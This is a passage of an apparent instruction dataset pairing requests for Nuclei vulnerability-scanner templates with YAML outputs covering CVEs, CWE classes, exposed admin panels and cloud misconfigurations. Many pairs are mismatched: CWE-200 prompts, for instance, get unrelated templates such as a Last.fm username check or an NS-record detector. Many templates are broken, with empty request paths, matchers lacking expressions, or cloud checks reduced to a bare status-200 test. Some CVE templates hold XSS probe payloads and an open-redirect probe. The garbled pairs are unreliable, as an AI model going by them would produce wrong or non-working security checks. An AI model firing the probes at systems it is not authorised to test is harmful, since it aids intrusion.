Azure Kubernetes Service (AKS) clusters, it is important to ensure they are running on the latest Kubernetes version. By doing so, you gain access to new and improved features, as well as the latest security patches. The Kubernetes API upgrade becomes fully available only after it is approved by Microsoft Azure.\n tags: cloud,devops,azure,microsoft,kubernetes,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-aks-api-version-not-latest"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: nameserver-fingerprint\n\ninfo:\n name: NS Record Detection\n author: pdteam\n severity: info\n description: An NS record was detected. An NS record delegates a subdomain to a set of name servers.\n tags: dns,ns,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Detects Springboot Jolokia Actuator", "input": "Title: Detects Springboot Jolokia Actuator\nSummary: Detects Springboot Jolokia Actuator. Springboot Jolokia Actuator is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: springboot-jolokia\n\ninfo:\n name: Detects Springboot Jolokia Actuator\n author: DhiyaneshDK\n severity: low\n description: Springboot Jolokia Actuator is exposed.\n tags: misconfig,springboot,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jolokia\" \n - \"{{BaseURL}}/actuator/jolokia\" \n matchers:\n - type: word\n words:\n - \"\"config\":{\" \n - \"\"agentId\":\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n - \"application/vnd.spring-boot.actuator\" \n - \"application/vnd.spring-boot.actuator.v1+json\" \n - \"application/vnd.spring-boot.actuator.v2+json\" \n - \"application/vnd.spring-boot.actuator.v3+json\" \n - \"text/plain\" \n part: header\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "springboot-jolokia"} {"instruction": "Generate a Nuclei template for: JsAPI Ticket Json", "input": "Title: JsAPI Ticket Json\nSummary: JsAPI Ticket Json. JsAPI Ticket internal file is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: jsapi-ticket-json\n\ninfo:\n name: JsAPI Ticket Json\n author: DhiyaneshDK\n severity: low\n description: JsAPI Ticket internal file is exposed.\n tags: exposure,jsapi,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jsapi_ticket.json\" \n matchers:\n - type: word\n words:\n - \"\"expire_time\":\" \n - \"\"jsapi_ticket\":\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "jsapi-ticket-json"} {"instruction": "Generate a Nuclei template for: OpenAM Security Checks", "input": "Title: OpenAM Security Checks\nSummary: OpenAM Security Checks. A simple workflow that runs all OpenAM related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: openam-workflow\n\ninfo:\n name: OpenAM Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all OpenAM related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "openam-workflow"} {"instruction": "Generate a Nuclei template for CVE-2023-34599", "input": "Title: Cross-Site Scripting (XSS) in gibbonedu gibbon\nSummary: Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: gibbonedu gibbon\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-34599\n\ninfo:\n name: Gibbon v25.0.0 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \">\" \n - \"gibbon\" \n part: body_2\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-34599"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: lastfm\n\ninfo:\n name: Last.fm User Name Information - Detect\n author: princechaddha,rxerium\n severity: info\n description: Last.fm user name information check was conducted.\n tags: osint,osint-social,lastfm,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://last.fm/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Music Profile | Last.fm\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-33405", "input": "Title: Vulnerability (CWE-601) in blogengine blogengine.net\nSummary: Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: blogengine blogengine.net\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-33405\n\ninfo:\n name: BlogEngine CMS - Open Redirect\n author: Shankar Acharya\n severity: medium\n description: Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect\n tags: cve2023,cve,Blogengine,cms,redirect,blogengine,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/default.aspx?years=http://oast.pro\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2023-33405"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: dynamic-registered-broadcast-receiver\n\ninfo:\n name: Android Dynamic Broadcast Receiver Register - Detect\n author: gaurang\n severity: info\n description: Android dynamic broadcast receiver register functionality was detected.\n tags: android,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Symfony _fragment - Detect", "input": "Title: Symfony _fragment - Detect\nSummary: Symfony _fragment - Detect. Symfony servers support a \"/_fragment\" command that allows clients to provide custom PHP commands and return the HTML output.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: symfony-fragment\n\ninfo:\n name: Symfony _fragment - Detect\n author: Palanichamy_perumal,TechbrunchFR\n severity: info\n description: Symfony servers support a \"/_fragment\" command that allows clients to provide custom PHP commands and return the HTML output.\n tags: config,exposure,symfony,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_fragment\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "symfony-fragment"} {"instruction": "Generate a Nuclei template for CVE-2025-49825", "input": "Title: Vulnerability (CWE-863) in CVE-2025-49825\nSummary: Teleport provides connectivity, authentication, access controls and audit for infrastructure. Community Edition versions before and including 17.5.1 are vulnerable to remote authentication bypass. At time of posting, there is no available open-source patch.\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-49825\n\ninfo:\n name: Teleport - Authentication Bypass\n author: pdteam\n severity: critical\n description: Teleport versions prior to 17.5.2 are vulnerable to a remote authentication bypass vulnerability. This issue allows attackers to gain unauthorized access to affected systems.\n tags: cve,cve2025,teleport,passive,auth-bypass,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webapi/ping\" \n matchers:\n - type: dsl\n condition: or\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2025-49825"} {"instruction": "Generate a Nuclei template for: Sliver C2 - Detect", "input": "Title: Sliver C2 - Detect\nSummary: Sliver C2 - Detect. Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sliver-c2\n\ninfo:\n name: Sliver C2 - Detect\n author: johnk3r\n severity: info\n description: Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server\n tags: c2,ssl,ir,osint,malware,sliver,tls,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sliver-c2"} {"instruction": "Generate a Nuclei template for CVE-2017-15944", "input": "Title: Vulnerability (CWE-20) in paloaltonetworks pan-os\nSummary: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: paloaltonetworks pan-os\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-15944\n\ninfo:\n name: Palo Alto Network PAN-OS - Remote Code Execution\n author: emadshanab,milo2012\n severity: critical\n description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.\n tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"@start@Success@end@\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-15944"} {"instruction": "Generate a Nuclei template for: PocketBase Panel - Detect", "input": "Title: PocketBase Panel - Detect\nSummary: PocketBase Panel - Detect. PocketBase Login panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pocketbase-panel\n\ninfo:\n name: PocketBase Panel - Detect\n author: userdehghani\n severity: info\n description: PocketBase Login panel was discovered.\n tags: panel,pocketbase,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_/#/login\" \n matchers:\n - type: word\n words:\n - \"PocketBase\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "pocketbase-panel"} {"instruction": "Generate a Nuclei template for CVE-2021-46381", "input": "Title: Path Traversal in dlink dap-1620_firmware\nSummary: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: dlink dap-1620_firmware\nIndicators: unauthorized", "output": "id: CVE-2021-46381\n\ninfo:\n name: D-Link DAP-1620 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].\n tags: cve2021,cve,lfi,router,packetstorm,dlink,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/apply.cgi\" \n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "high", "id": "CVE-2021-46381"} {"instruction": "Generate a Nuclei template for: S3 Bucket with Public WRITE Access", "input": "Title: S3 Bucket with Public WRITE Access\nSummary: S3 Bucket with Public WRITE Access. Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: s3-public-write\n\ninfo:\n name: S3 Bucket with Public WRITE Access\n author: princechaddha\n severity: critical\n description: Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions.\n tags: cloud,devops,aws,amazon,s3,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "s3-public-write"} {"instruction": "Generate a Nuclei template for: Cloudlog System - SQL Injection", "input": "Title: Cloudlog System - SQL Injection\nSummary: Cloudlog System - SQL Injection. Unauthorised SQL injection vulnerability in the Cloudlog system interface request_form. In addition to being able to exploit the SQL injection vulnerability to obtain information from the database, unauthenticated remote attackers can also.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cloudlog-system-sqli\n\ninfo:\n name: Cloudlog System - SQL Injection\n author: s4e-io\n severity: high\n description: Unauthorised SQL injection vulnerability in the Cloudlog system interface request_form. In addition to being able to exploit the SQL injection vulnerability to obtain information from the database, unauthenticated remote attackers can also.\n tags: cloudlog,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "cloudlog-system-sqli"} {"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of Script-Related HTML Tags in a Web Page (CWE-80)\nSummary: The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"<\", \">\", and \"&\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.\nVulnerability Type: Improper Neutralization of Script-Related HTML Tags in a Web Page\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: new-user-approve-xss\n\ninfo:\n name: WordPress New User Approve <2.4.1 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress New User Approve 2.4.1 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.\n tags: wordpress,xss,authenticated,wp-plugin,wpscan,wp,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"?a\"><script>alert(1)</script>&new-user-approve-settings\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-80"} {"instruction": "Generate a Nuclei template for: Etcd Server - Unauthenticated Access", "input": "Title: Etcd Server - Unauthenticated Access\nSummary: Etcd Server - Unauthenticated Access. A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: unauth-etcd-server\n\ninfo:\n name: Etcd Server - Unauthenticated Access\n author: sharath,pussycat0x\n severity: high\n description: A Kubernetes etcd server stores the cluster secrets and configurations files. Anonymous access on etcd allows unauthenticated access the data without providing any authentication credentials.\n tags: tech,k8s,kubernetes,devops,etcd,unauth,anonymous,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/v2/keys/\" \n matchers:\n - type: word\n words:\n - \"\"node\":\" \n - \"\"key\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "unauth-etcd-server"} {"instruction": "Generate a Nuclei template for CVE-2024-32640", "input": "Title: SQL Injection in CVE-2024-32640\nSummary: MASA CMS is an Enterprise Content Management platform based on open source technology. Versions prior to 7.4.6, 7.3.13, and 7.2.8 contain a SQL injection vulnerability in the `processAsyncObject` method that can result in remote code execution. Versions 7.4.6, 7.3.13, and 7.2.8 contain a fix for the issue.\nVulnerability Type: SQL Injection\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-32640\n\ninfo:\n name: Mura/Masa CMS - SQL Injection\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The Mura/Masa CMS is vulnerable to SQL Injection.\n tags: cve,cve2024,sqli,cms,masa,masacms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-32640"} {"instruction": "Generate a Nuclei template for: GCP Firebase Apps - Cloud Enumeration", "input": "Title: GCP Firebase Apps - Cloud Enumeration\nSummary: GCP Firebase Apps - Cloud Enumeration. Searches for Firebase Apps in GCP.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gcp-firebase-app-enum\n\ninfo:\n name: GCP Firebase Apps - Cloud Enumeration\n author: initstring\n severity: info\n description: Searches for Firebase Apps in GCP.\n tags: enum,cloud,cloud-enum,gcp,discovery\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "gcp-firebase-app-enum"} {"instruction": "Generate a Nuclei template for: MFA not enabled on AWS Root Account", "input": "Title: MFA not enabled on AWS Root Account\nSummary: MFA not enabled on AWS Root Account. Checks if Multi-Factor Authentication (MFA) is enabled for the AWS root account\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: iam-root-mfa\n\ninfo:\n name: MFA not enabled on AWS Root Account\n author: princechaddha\n severity: high\n description: Checks if Multi-Factor Authentication (MFA) is enabled for the AWS root account\n tags: cloud,devops,aws,amazon,iam,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "iam-root-mfa"} {"instruction": "Generate a Nuclei template for CVE-2023-4116", "input": "Title: Cross-Site Scripting (XSS) in phpjabbers taxi_booking_script\nSummary: A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: phpjabbers taxi_booking_script\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-4116\n\ninfo:\n name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n tags: cve,cve2023,packetstorm,xss,phpjabbers,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-4116"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: airnotifier-panel\n\ninfo:\n name: AirNotifier Login Panel - Detect\n author: tess\n severity: info\n description: AirNotifier login panel was detected.\n tags: panel,airnotifier,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: word\n words:\n - \"AirNotifier\" \n - \"Stats\" \n - \"Server Info\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-24300", "input": "Title: Cross-Site Scripting (XSS) in pickplugins product_slider_for_woocommerce\nSummary: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: pickplugins product_slider_for_woocommerce\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24300\n\ninfo:\n name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.\n tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"value=\"\\\"onmouseover=alert(document.domain);//\">\" \n - \"PickPlugins Product Slider\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24300"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: xibocms-login\n\ninfo:\n name: Xibo CMS Login Panel - Detect\n author: ritikchaddha,daffainfo\n severity: info\n description: Xibo CMS login panel was detected.\n tags: panel,xibocms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"xibo-cms\" \n - \"class=\"XiboFormButton\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: rsyncd-service-detect\n\ninfo:\n name: Rsyncd Service - Detect\n author: vsh00t,geeknik\n severity: info\n description: Rsyncd service was detected.\n tags: network,rsyncd,detect,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: GKE Clusters Without Binary Authorization Enabled", "input": "Title: GKE Clusters Without Binary Authorization Enabled\nSummary: GKE Clusters Without Binary Authorization Enabled. Ensure that Binary Authorization is enabled for your Google Kubernetes Engine (GKE) clusters to enforce container image security policies. Binary Authorization enhances security by ensuring only trusted container images can be deployed, reducing the risk of deploying vulnerable or unauthorized software.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-gke-binary-authorization-disabled\n\ninfo:\n name: GKE Clusters Without Binary Authorization Enabled\n author: princechaddha\n severity: medium\n description: Ensure that Binary Authorization is enabled for your Google Kubernetes Engine (GKE) clusters to enforce container image security policies. Binary Authorization enhances security by ensuring only trusted container images can be deployed, reducing the risk of deploying vulnerable or unauthorized software.\n tags: cloud,devops,gcp,gcloud,gke,kubernetes,security,container,authorization,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-gke-binary-authorization-disabled"} {"instruction": "Generate a Nuclei template for: Android Exported Providers - Detect", "input": "Title: Android Exported Providers - Detect\nSummary: Android Exported Providers - Detect. Detects exported content providers declared in the app\u2019s AndroidManifest.xml, excluding those added by dependency libraries.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: exported-providers\n\ninfo:\n name: Android Exported Providers - Detect\n author: 7h3b4dger\n severity: info\n description: Detects exported content providers declared in the app\u2019s AndroidManifest.xml, excluding those added by dependency libraries.\n tags: android,file,exportedcomponents\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "exported-providers"} {"instruction": "Generate a Nuclei template for: Seeyon OA A6 createMysql.jsp Database - Information Disclosure", "input": "Title: Seeyon OA A6 createMysql.jsp Database - Information Disclosure\nSummary: Seeyon OA A6 createMysql.jsp Database - Information Disclosure. Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: seeyon-createmysql-exposure\n\ninfo:\n name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure\n author: SleepingBag945\n severity: medium\n description: Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.\n tags: seeyon,oa,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/yyoa/createMysql.jsp\" \n - \"{{BaseURL}}/yyoa/ext/createMysql.jsp\" \n matchers:\n - type: word\n words:\n - \"root</br>\" \n part: body\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "seeyon-createmysql-exposure"} {"instruction": "Generate a Nuclei template for: Jira Unauthenticated Admin Projects", "input": "Title: Jira Unauthenticated Admin Projects\nSummary: Jira Unauthenticated Admin Projects. Tags: atlassian, jira, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jira-unauthenticated-adminprojects\n\ninfo:\n name: Jira Unauthenticated Admin Projects\n author: TESS\n severity: info\n description: Jira Unauthenticated Admin Projects\n tags: atlassian,jira,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rest/menu/latest/admin\" \n matchers:\n - type: word\n words:\n - \"key\" \n - \"link\" \n - \"label\" \n - \"self\" \n condition: and\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"atlassian.xsrf.token\" \n part: header", "category": "generic", "severity": "info", "id": "jira-unauthenticated-adminprojects"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: symfony-profiler\n\ninfo:\n name: Symfony Profiler - Detect\n author: pdteam\n severity: high\n description: Symfony profiler was detected.\n tags: config,exposure,symfony,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/index.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/index_dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/debug.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/_debug/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/web/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/public/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/frontend_dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/backend_dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/api_dev.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/app.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/app_test.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/test.php/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/symfony/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/debug/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/dev/_profiler/empty/search/results?limit=10\" \n - \"{{BaseURL}}/profiler/empty/search/results?limit=10\" \n matchers:\n - type: word\n words:\n - \"Symfony Profiler\" \n - \"<title>Profiler\" \n - \"Symfony-Debug-Toolbar\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Improper Neutralization of Script-Related HTML Tags in a Web Page", "input": "Title: Improper Neutralization of 